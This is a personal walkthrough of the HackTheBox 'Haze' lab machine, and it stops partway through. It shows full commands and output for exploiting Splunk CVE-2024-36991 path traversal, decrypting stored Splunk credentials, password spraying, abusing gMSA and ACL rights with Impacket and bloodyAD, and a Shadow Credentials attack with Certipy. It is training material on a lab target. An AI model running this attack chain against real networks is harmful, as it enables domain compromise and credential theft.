Haze – HackTheBox Link to heading
- OS: Windows
- Difficulty: Hard
- Platform: HackTheBox
Summary Link to heading
“Haze” is a Hard machine from HackTheBox platform. The victim machine is running a Domain Controller for an Active Directory environment along with a web server. This web server is running a vulnerable Splunk version to CVE-2024-36991, which allow us to read system files. This allow us to read Splunk configuration files, get a hash, decrypt it and gain access as a first user. We perform a password spray and see that a second user uses exactly the same password for the first user, pivoting to a new user. This new user is part of a group that can modify gMSA accounts. This allow us to gran ourselves permissions to read the gMSA NT hash and take control of a gMSA account. This account can perform a Shadow Credentials attack over a third user, which allow us to extract its NT hash and get access through WinRM service into the victim machine. Once inside the victim machine, we can see it is storing a backup for Splunk service, where we are able to decrypt again credentials for this service. With this action we retrieve credentials for the Splunk service running on the machine. This allow us gain access to the service and upload a malicious application in Splunk and get a reverse shell as a fourth user. This user has SeImpersonatePrivilege, which eventually allow us to elevate our privileges and compromise the system/domain.
User Link to heading
We start running Nmap against the victim machine. We have many multiple ports open; among them we have: 53 DNS, 88 Kerberos, 135 Microsoft RPC, 389 LDAP, 445 SMB, 5985 WinRM, 8000 HTTP, among many others.
❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,8000,8088,8089,9389,47001,49664,49665,49666,49667,49668,49672,49679,49680,54337,54342,54344,54357,54398 10.129.229.51
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-30 20:26 -03
Nmap scan report for 10.129.229.51
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-31 07:26:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after: 2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8000/tcp open http Splunkd httpd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
8088/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: 404 Not Found
| http-robots.txt: 1 disallowed entry
|_/
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after: 2028-03-04T07:29:08
|_http-title: splunkd
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49679/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49680/tcp open msrpc Microsoft Windows RPC
54337/tcp open msrpc Microsoft Windows RPC
54342/tcp open msrpc Microsoft Windows RPC
54344/tcp open msrpc Microsoft Windows RPC
54357/tcp open msrpc Microsoft Windows RPC
54398/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m00s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-31T07:27:17
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.73 seconds
Given open ports we can se we are against a machine in an Active Directory environment. Additionally, port 8000 is running Splunk.
Splunk is a big data platform that simplifies the task of collecting and managing massive volumes of machine-generated data and searching for information within it. The technology is used for business and web analytics, application management, compliance, and security.Using WhatWeb against this site confirms this result:
❯ whatweb -a 3 http://10.129.229.51:8000/
http://10.129.229.51:8000/ [303 See Other] Country[RESERVED][ZZ], HTML5, HTTPServer[Splunkd], IP[10.129.229.51], Meta-Refresh-Redirect[http://10.129.229.51:8000/en-US/], RedirectLocation[http://10.129.229.51:8000/en-US/], Title[303 See Other], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
http://10.129.229.51:8000/en-US/ [303 See Other] Cookies[session_id_8000], Country[RESERVED][ZZ], HTTPServer[Splunkd], HttpOnly[session_id_8000], IP[10.129.229.51], RedirectLocation[http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F], UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN]
http://10.129.229.51:8000/en-US/account/login?return_to=%2Fen-US%2F [200 OK] Bootstrap, Cookies[cval,splunkweb_uid], Country[RESERVED][ZZ], HTML5, HTTPServer[Splunkd], IP[10.129.229.51], Meta-Author[Splunk Inc.], Script[text/json], probably Splunk, UncommonHeaders[x-content-type-options], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge]
Additionally, we can use NetExec against SMB service of the victim machine to get the domain name and machine name:
❯ nxc smb 10.129.229.51
SMB 10.129.229.51 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
We have a machine name DC01 and a domain haze.htb.
Add the machine name, domain and FQDN (which is <machine name>.<domain>) to our /etc/hosts file:
❯ echo '10.129.229.51 DC01 DC01.HAZE.HTB HAZE.HTB' | sudo tee -a /etc/hosts
Visiting then http://haze.htb:8000 shows a Splunk login panel:
We note from Nmap output that Splunk is also running on port 8088 and 8089 with HTTPs. Visiting port 8088 does not return anything. Nevertheless, port 8089 (visiting https://haze.htb:8089) shows some information about Splunk itself:
We can see a version for Splunk: 9.2.1.
Searching for splunk 9.2.1 exploit reaches to this page. There, they talk about a vulnerability labeled as CVE-2024-36991 which allow us to read files through a Path Traversal. Additionally, it says that only Splunk versions for Windows should be affected (which is the case). Searching for Proof of Concepts (or “PoCs”) we find this Github repository. Clone it and run it against the target machine:
❯ git clone https://github.com/bigb0x/CVE-2024-36991.git -q
❯ cd CVE-2024-36991
❯ python3 CVE-2024-36991.py -u http://haze.htb:8000
______ _______ ____ ___ ____ _ _ _____ __ ___ ___ _
/ ___\ \ / | ____| |___ \ / _ |___ \| || | |___ / / /_ / _ \ / _ \/ |
| | \ \ / /| _| _____ __) | | | |__) | || |_ _____ |_ \| '_ | (_) | (_) | |
| |___ \ V / | |__|_____/ __/| |_| / __/|__ _|________) | (_) \__, |\__, | |
\____| \_/ |_____| |_____|\___|_____| |_| |____/ \___/ /_/ /_/|_|
-> POC CVE-2024-36991. This exploit will attempt to read Splunk /etc/passwd file.
-> By x.com/MohamedNab1l
-> Use Wisely.
[INFO] Log directory created: logs
[INFO] Testing single target: http://haze.htb:8000
[VLUN] Vulnerable: http://haze.htb:8000
:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152
It worked. We have 4 hashes.
We attempt to crack these hashes through a Brute Force Password Cracking with john and Hashcat with rockyou.txt dictionary; but we were not able to crack these hashes.
However, if we read the output from the script, it is attempting to read /etc/passwd file from Splunk. Since the Path Traversal works, we could slightly modify this script to be able to read files in the system as well, or to read any Splunk configuration file we want. The script I have done for this vulnerability can be found at my Github repository. Let’s test if we can read Splunk files. We can get a list of configuration files at Splunk documentation. Additionally, we also find more Splunk documentation or its forum that gives explanation for important files. There, they mention an $SPLUNK_HOME/etc/auth directory, where $SPLUNK_HOME is the base directory for Splunk. Run our script:
❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/etc/auth/splunk.secret'
======================================================================
CVE-2024-36991
[*] Target URL: http://haze.htb:8000
[*] File to read: /etc/auth/splunk.secret
[*] Language: en_us
======================================================================
[*] Target seems to be vulnerable!
[*] Content extracted:
NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD
Our script worked. We also got a secret for Splunk which might be useful later.
We can also check that this script can read system files adding --system-files flag:
❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/Windows/System32/drivers/etc/hosts' --system-files
======================================================================
CVE-2024-36991
[*] Target URL: http://haze.htb:8000
[*] File to read: /Windows/System32/drivers/etc/hosts (System file)
[*] Language: en_us
======================================================================
[*] Target seems to be vulnerable!
[*] Content extracted:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
After attempting to read some files, we go back to Splunk documentation. For authentication.conf file, documentation talks about a path $SPLUNK_HOME/etc/system/local. Attempting to read this file we get:
❯ python3 CVE-2024-36991.py -u http://haze.htb:8000 -f '/etc/system/local/authentication.conf'
======================================================================
CVE-2024-36991
[*] Target URL: http://haze.htb:8000
[*] File to read: /etc/system/local/authentication.conf
[*] Language: en_us
======================================================================
[*] Target seems to be vulnerable!
[*] Content extracted:
[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0
[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname
[authentication]
authSettings = Haze LDAP Auth
authType = LDAP
We got a hash:
$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
and a distinguishedName for Active Directory (specifically for LDAP):
CN=Paul Taylor,CN=Users,DC=haze,DC=htb
We can quickly check if this user exists with Kerbrute. Create a list with a list of potential users:
❯ cat paul_taylor_options.txt
paul taylor
paul.taylor
p.taylor
and use Kerbrute to check if any of them do exist in the victim machine:
❯ kerbrute userenum -d haze.htb --dc 10.129.229.51 paul_taylor_options.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 03/31/25 - Ronnie Flathers @ropnop
2025/03/31 02:01:47 > Using KDC(s):
2025/03/31 02:01:47 > 10.129.229.51:88
2025/03/31 02:01:48 > [+] VALID USERNAME: paul.taylor@haze.htb
paul.taylor does exist in the victim machine.
Now, we need somewhat to crack the password found at authentication.conf file. It is not crackeable, so do not lose your time attempting to crack it. Searching for tools that can help us to crack this, we find a tool called splunksecrets. To install it, to not break any system packages, I will install it using pipx (here you can check how to install pipx). To install splunksecrets with pipx we run the command:
❯ pipx install 'git+https://github.com/HurricaneLabs/splunksecrets.git'
Once installed, just run splunksecrets command.
❯ splunksecrets --help
Usage: splunksecrets [OPTIONS] COMMAND [ARGS]...
Options:
--help Show this message and exit.
Commands:
dbconnect-decrypt Decrypt password used for dbconnect identity
dbconnect-encrypt Encrypt password used for dbconnect identity
phantom-decrypt Decrypt password used for Phantom asset
phantom-encrypt Encrypt password used for Phantom asset
splunk-decrypt Decrypt password using Splunk 7.2 algorithm
splunk-encrypt Encrypt password using Splunk 7.2 algorithm
splunk-hash-passwd Generate password hash for use in...
splunk-legacy-decrypt Decrypt password using legacy Splunk algorithm...
splunk-legacy-encrypt Encrypt password using legacy Splunk algorithm...
We have many options.
After testing some of them, splunk-legacy-decrypt works. For this to work we need 2 items: 1) A Splunk secret; 2) A ciphertext (encrypted password). Previously, when we were testing our script to read files, we extracted the content of /etc/auth/splunk.secret file. Save that secret into a file in our attacker machine:
❯ echo 'NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD' > splunk.secret
Then, pass the file containing the secret to -S flag and the encrypted password to --ciphertext flag:
❯ splunksecrets splunk-legacy-decrypt -S splunk.secret --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24
We got a password: Ld@p_Auth_Sp1unk@2k24.
Check if this password works for paul.taylor user (which we have seen that does exist in the victim machine/domain) with NetExec:
❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24'
SMB 10.129.229.51 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.51 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
They worked. We have valid credentials for the AD domain.
A curious thing about this machine is that if we attempt to enumerate users through Microsoft RPC service with rpcclient we only get our own user:
❯ rpcclient -U 'paul.taylor%Ld@p_Auth_Sp1unk@2k24' 10.129.229.51 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'
paul.taylor
However, if we use NetExec and --rid-brute for SMB module (and after filtering by what is interesting to us) we get way more users:
❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}'
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
Save those users into a file:
❯ nxc smb haze.htb -u 'paul.taylor' -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep 'SidTypeUser' | awk '{print $6}' | awk -F '\' '{print $2}' > domain_users.txt
and check if the password for paul.taylor is used by other user in the domain with NetExec:
❯ nxc smb haze.htb -u domain_users.txt -p 'Ld@p_Auth_Sp1unk@2k24' --continue-on-success
SMB 10.129.229.51 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB 10.129.229.51 445 DC01 [-] haze.htb\Administrator:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [-] haze.htb\Guest:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [-] haze.htb\krbtgt:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [-] haze.htb\DC01$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24
SMB 10.129.229.51 445 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
SMB 10.129.229.51 445 DC01 [-] haze.htb\edward.martin:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [-] haze.htb\alexander.green:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
SMB 10.129.229.51 445 DC01 [-] haze.htb\Haze-IT-Backup$:Ld@p_Auth_Sp1unk@2k24 STATUS_LOGON_FAILURE
Besides paul.taylor, we also find that the same password is being used for mark.adams user.
Let’s check if mark.adams can log into the victim machine through WinRM service with NetExec:
❯ nxc winrm haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
WINRM 10.129.229.51 5985 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:haze.htb)
WINRM 10.129.229.51 5985 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24 (Pwn3d!)
It can.
Therefore, use evil-winrm to log in as mark.adams user:
❯ evil-winrm -i haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mark.adams\Documents>
Also, this user is capable to enumerate more users in the domain with Microsoft RPC service along with rpcclient:
❯ rpcclient -U 'mark.adams%Ld@p_Auth_Sp1unk@2k24' 10.129.229.51 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'
Administrator
Guest
krbtgt
paul.taylor
mark.adams
alexander.green
Why I am telling this? “Out of cameras” I used bloodhound-python to analyze the domain with Bloodhound, but results were bugged: we had less users than usual and groups were enumerated only by their SID (later I discovered it was not a bug, it was intended). What I am telling is that if we attempted to enumerate the domain with Bloodhound only using paul.taylor credentials the scan was incomplete, which makes sense if somehow this user is limited to read ACLs and SIDs in the domain.
Now let’s try to use SharpHound (which can be downloaded from its Github repository) to properly enumerate the domain. Once we download the files and extract its .exe file, upload it into the victim machine using upload function from evil-winrm:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> upload SharpHound.exe
Once uploaded, execute it:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> .\SharpHound.exe -c All
2025-03-31T07:57:09.4419327-07:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-03-31T07:57:09.6606136-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
<SNIP>
This should generate a .zip file into the current directory:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir
Directory: C:\Users\mark.adams\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/31/2025 7:57 AM 34879 20250331075712_BloodHound.zip
-a---- 3/31/2025 7:57 AM 1595 NzBkNGM2ZWYtODFhYy00M2M0LTgzNzMtNmViNTQ1NzJhN2Nk.bin
-a---- 3/31/2025 7:55 AM 1556992 SharpHound.exe
Download that file into our attacker machine using download command from evil-winrm:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> download 20250331075712_BloodHound.zip
Info: Downloading C:\Users\mark.adams\Documents\20250331075712_BloodHound.zip to 20250331075712_BloodHound.zip
Info: Download successful!
Once downloaded in our attacker machine, upload the generated .zip file to Bloodhound. In my case I use the Community Edition (or CE). Searching for mark.adams user does not show directly rights over other accounts. However, this user is part of an interesting group called gMSA_Managers:
This could mean that we might have rights over GMSA accounts.
Usually, if we had ReadGMSAPassword rights over an account we can run its NT hash using, for example, NetExec as follows:
❯ nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB 10.129.234.37 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.234.37 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.129.234.37 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.234.37 636 DC01 Account: Haze-IT-Backup$ NTLM:
It found a GMSA account called Haze-IT-Backup, but it did not display its NT hash. This is because we (still) do not have ReadGMSAPassword rights over this account.
Searching how to add ReadGMSAPassword rights to an account we find this blog explaining how to do it. There, they provide the command:
Set-ADServiceAccount `
-Identity 'SQL_HQ_Primary' `
-PrincipalsAllowedToRetrieveManagedPassword 'Administrator'
If we are able to add this right (since we are part of gMSA_Managers group), let’s then run the previous command in our evil-winrm session, but modifying it:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> Set-ADServiceAccount -Identity 'Haze-IT-Backup' -PrincipalsAllowedToRetrieveManagedPassword 'mark.adams'
We got no output, so maybe it worked and mark.adams now has ReadGMSAPassword rights over Haze-It-Backup account.
Run again the previous command with NetExec to abuse ReadGMSAPassword:
❯ nxc ldap haze.htb -u 'mark.adams' -p 'Ld@p_Auth_Sp1unk@2k24' --gmsa
SMB 10.129.234.37 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAPS 10.129.234.37 636 DC01 [+] haze.htb\mark.adams:Ld@p_Auth_Sp1unk@2k24
LDAPS 10.129.234.37 636 DC01 [*] Getting GMSA Passwords
LDAPS 10.129.234.37 636 DC01 Account: Haze-IT-Backup$ NTLM: 735c02c6b2dc54c3c8c6891f55279ebc
This time it worked. We got an NT hash for Haze-IT-Backup$.
bloodhound-python again as HAZE-IT-BACKUP user and, again, I found users that we did not found previously. This is a really interesting detail in this machine.We execute bloodhound-python (along with faketime and ntpdate to avoid clock errors with Kerberos) in a terminal:
❯ faketime "$(ntpdate -q haze.htb | cut -d ' ' -f 1,2)" bloodhound-python -c ALL -u 'Haze-IT-Backup$' --hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -d haze.htb -ns 10.129.234.37 --zip
<SNIP>
and upload that new .zip file to Bloodhound.
Now, back to Bloodhound we can check what Haze-IT-Backup$ account can do. We get that this account has WriteOwner rights over Support_Services group:
and, at the same time, Support_Services has ForceChangePassword and AddKeyCredentialLink to edward.martin user:
The plan then is simple:
- Add ourselves (
Haze-IT-Backup$account) as owners ofSupport_Servicegroup. - As owners of
Support_Servicegroup, add ourselves to this group. - Abuse
AddKeyCredentialLinkto perform aShadow Credentialsattack overedward.martinuser.
First, use owneredit.py from Impacket to add ourselves (Haze-IT-Backup$ account) as owners of the group Support_Service:
❯ impacket-owneredit -action write -new-owner 'Haze-IT-Backup$' -target 'Support_Services' -dc-ip haze.htb haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Current owner information below
[*] - SID: S-1-5-21-323145914-28650650-2368316563-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=haze,DC=htb
[*] OwnerSid modified successfully!
Second, add ourselves FullControl rights over this group using impacket-dacledit:
❯ impacket-dacledit -principal 'Haze-IT-Backup$' -target 'Support_Services' -action write -rights FullControl -dc-ip haze.htb haze.htb/'Haze-IT-Backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc'
Third, we can use bloodyAD (which can be downloaded here, or with pip install bloodyAD command) to add ourselves to Support_Services group:
❯ bloodyAD --host haze.htb -d haze.htb -u 'Haze-IT-Backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' add groupMember 'Support_Services' 'Haze-IT-Backup$'
[+] Haze-IT-Backup$ added to Support_Services
Now we should be able to perform a Shadow Credentials attack over edward.martin user. For this purpose we can use Certipy tool (which can be downloaded here, or running pip3 install certipy-ad) along with faketime and ntpdate to avoid issues with Kerberos:
❯ faketime "$(ntpdate -q haze.htb | cut -d ' ' -f 1,2)" certipy shadow auto -username 'Haze-IT-Backup$'@haze.htb -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -account 'edward.martin'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'edward.martin'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '93f3000d-db98-9f29-dbde-99994c848143'
[*] Adding Key Credential with device ID '93f3000d-db98-9f29-dbde-99994c848143' to the Key Credentials for 'edward.martin'
[*] Successfully added Key Credential with device ID '93f3000d-db98-9f29-dbde-99994c848143' to the Key Credentials for 'edward.martin'
[*] Authenticating as 'edward.martin' with the certificate
[*] Using principal: edward.martin@haze.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'edward.martin.ccache'
[*] Trying to retrieve NT hash for 'edward.martin'
[*] Restoring the old Key Credentials for 'edward.martin'
[*] Successfully restored the old Key Credentials for 'edward.martin'
[*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
Haze-IT-Backup$. If we get a permission error we might need to run all the “chain” attack again to grant us privileges to perform Shadow Credentials attack.Check if we can connect with this user through evil-winrm as edward.martin with the obtained NT hash:
❯ evil-winrm -i haze.htb -u 'edward.martin' -H '09e0b3eeb2e7a6b0d419e9ff8f4d91af'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\edward.martin\Documents>
We can connect. We can grab the user flag at edward.martin Desktop.
NT Authority/System - Administrator Link to heading
When I entered for the very first time in the machine as mark.adams user through evil-winrm I noticed there was a Backups folder at C:\, but we did not have permissions to check it:
*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir C:\
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/5/2025 12:32 AM Backups
d----- 3/25/2025 2:06 PM inetpub
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 3/4/2025 11:28 PM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 3/31/2025 8:11 AM Users
d----- 3/25/2025 2:15 PM Windows
*Evil-WinRM* PS C:\Users\mark.adams\Documents> dir C:\Backups
Access to the path 'C:\Backups' is denied.
At line:1 char:1
+ dir C:\Backups
+ ~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Backups:String) [Get-ChildItem], UnauthorizedAccessException
